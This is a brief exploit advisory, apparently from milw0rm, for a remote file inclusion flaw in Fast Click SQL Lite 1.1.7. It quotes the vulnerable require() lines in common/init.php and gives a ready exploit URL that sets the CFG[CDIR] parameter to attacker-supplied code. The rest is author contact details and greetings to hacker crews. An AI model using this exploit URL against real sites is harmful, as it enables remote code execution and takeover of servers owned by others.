=========================================================================================== [o] Fast CLick SQL Lite 1.1.7 Remote File Inclusion Vulnerability Software : Fast CLick SQL Lite version 1.1.7 Vendor : http://www.ftrsoft.com/ Download : http://www.ftrsoft.com/downloads.html Author : NoGe Contact : noge[at]mainhack[dot]com =========================================================================================== [o] Vulnerable file common/init.php require($CFG['CDIR'].'/global.php'); require($CFG['CDIR'].'/sql.php'); [o] Exploit http://localhost/[path]/common/init.php?CFG[CDIR]=[evilcode] =========================================================================================== [o] Greetz MainHack BrotherHood [ www.mainhack.com ] VOP Crew [ Vaksin13 OoN_BoY Paman ] H312Y yooogy mousekill }^-^{ k1tk4t skulmatic olibekas ulga Cungkee str0ke =========================================================================================== # milw0rm.com [2008-10-19]